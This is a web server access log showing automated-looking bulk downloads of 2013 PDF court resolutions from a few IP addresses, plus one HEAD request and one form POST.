3.224.220.101 - - [23/Feb/2024:04:56:22 -0500] "GET /BLA/resoluciones/AUTOS%202013/3731.pdf HTTP/1.1" 200 901015
3.224.220.101 - - [23/Feb/2024:04:56:26 -0500] "GET /BLA/resoluciones/AUTOS%202013/0699.pdf HTTP/1.1" 200 1850585
52.70.240.171 - - [23/Feb/2024:04:56:32 -0500] "GET /BLA/resoluciones/AUTOS%202013/2164.pdf HTTP/1.1" 200 630383
52.70.240.171 - - [23/Feb/2024:04:56:35 -0500] "GET /BLA/resoluciones/AUTOS%202013/0958.pdf HTTP/1.1" 200 2182158
23.22.35.162 - - [23/Feb/2024:04:56:38 -0500] "GET /BLA/resoluciones/AUTOS%202013/3524.pdf HTTP/1.1" 200 660728
52.70.240.171 - - [23/Feb/2024:04:56:42 -0500] "GET /BLA/resoluciones/AUTOS%202013/1156.pdf HTTP/1.1" 200 828065
3.224.220.101 - - [23/Feb/2024:04:56:46 -0500] "GET /BLA/resoluciones/AUTOS%202013/1291.pdf HTTP/1.1" 200 1621678
3.224.220.101 - - [23/Feb/2024:04:56:50 -0500] "GET /BLA/resoluciones/AUTOS%202013/0778.pdf HTTP/1.1" 200 1750251
3.224.220.101 - - [23/Feb/2024:04:56:54 -0500] "GET /BLA/resoluciones/AUTOS%202013/2867.pdf HTTP/1.1" 200 923272
23.22.35.162 - - [23/Feb/2024:04:57:00 -0500] "GET /BLA/resoluciones/AUTOS%202013/1190.pdf HTTP/1.1" 200 261775
23.22.35.162 - - [23/Feb/2024:04:57:02 -0500] "GET /BLA/resoluciones/AUTOS%202013/0814.pdf HTTP/1.1" 200 3125935
3.224.220.101 - - [23/Feb/2024:04:57:06 -0500] "GET /BLA/resoluciones/AUTOS%202013/1257.pdf HTTP/1.1" 200 238622
23.22.35.162 - - [23/Feb/2024:04:57:10 -0500] "GET /BLA/resoluciones/AUTOS%202013/0857.pdf HTTP/1.1" 200 605883
3.224.220.101 - - [23/Feb/2024:04:57:14 -0500] "GET /BLA/resoluciones/AUTOS%202013/3087.pdf HTTP/1.1" 200 411027
52.70.240.171 - - [23/Feb/2024:04:57:18 -0500] "GET /BLA/resoluciones/AUTOS%202013/3044.pdf HTTP/1.1" 200 758045
216.245.221.92 - - [23/Feb/2024:04:57:20 -0500] "HEAD / HTTP/1.1" 200 -
52.70.240.171 - - [23/Feb/2024:04:57:23 -0500] "GET /BLA/resoluciones/AUTOS%202013/1591.pdf HTTP/1.1" 200 397980
3.224.220.101 - - [23/Feb/2024:04:57:26 -0500] "GET /BLA/resoluciones/AUTOS%202013/1370.pdf HTTP/1.1" 200 2488522
52.70.240.171 - - [23/Feb/2024:04:57:30 -0500] "GET /BLA/resoluciones/AUTOS%202013/0026.pdf HTTP/1.1" 200 2439276
23.22.35.162 - - [23/Feb/2024:04:57:35 -0500] "GET /BLA/resoluciones/AUTOS%202013/0891.pdf HTTP/1.1" 200 511713
3.224.220.101 - - [23/Feb/2024:04:57:38 -0500] "GET /BLA/resoluciones/AUTOS%202013/3123.pdf HTTP/1.1" 200 752990
23.22.35.162 - - [23/Feb/2024:04:57:47 -0500] "GET /BLA/resoluciones/AUTOS%202013/2565.pdf HTTP/1.1" 200 766834
3.224.220.101 - - [23/Feb/2024:04:57:47 -0500] "GET /BLA/resoluciones/AUTOS%202013/0060.pdf HTTP/1.1" 200 1400072
23.22.35.162 - - [23/Feb/2024:04:57:50 -0500] "GET /BLA/resoluciones/AUTOS%202013/2980.pdf HTTP/1.1" 200 1676196
3.224.220.101 - - [23/Feb/2024:04:57:54 -0500] "GET /BLA/resoluciones/AUTOS%202013/1336.pdf HTTP/1.1" 200 602277
3.224.220.101 - - [23/Feb/2024:04:57:58 -0500] "GET /BLA/resoluciones/AUTOS%202013/1516.pdf HTTP/1.1" 200 2142190
23.22.35.162 - - [23/Feb/2024:04:58:02 -0500] "GET /BLA/resoluciones/AUTOS%202013/0542.pdf HTTP/1.1" 200 1640775
23.22.35.162 - - [23/Feb/2024:04:58:06 -0500] "GET /BLA/resoluciones/AUTOS%202013/3711.pdf HTTP/1.1" 200 724655
201.245.192.253 - - [23/Feb/2024:04:58:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65944fe978afe447f8630f37f4d10f40c.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
3.224.220.101 - - [23/Feb/2024:04:58:12 -0500] "GET /BLA/resoluciones/AUTOS%202013/2317.pdf HTTP/1.1" 200 492757
3.224.220.101 - - [23/Feb/2024:04:58:14 -0500] "GET /BLA/resoluciones/AUTOS%202013/2101.pdf HTTP/1.1" 200 716112
52.70.240.171 - - [23/Feb/2024:04:58:18 -0500] "GET /BLA/resoluciones/AUTOS%202013/0598.pdf HTTP/1.1" 200 1577128
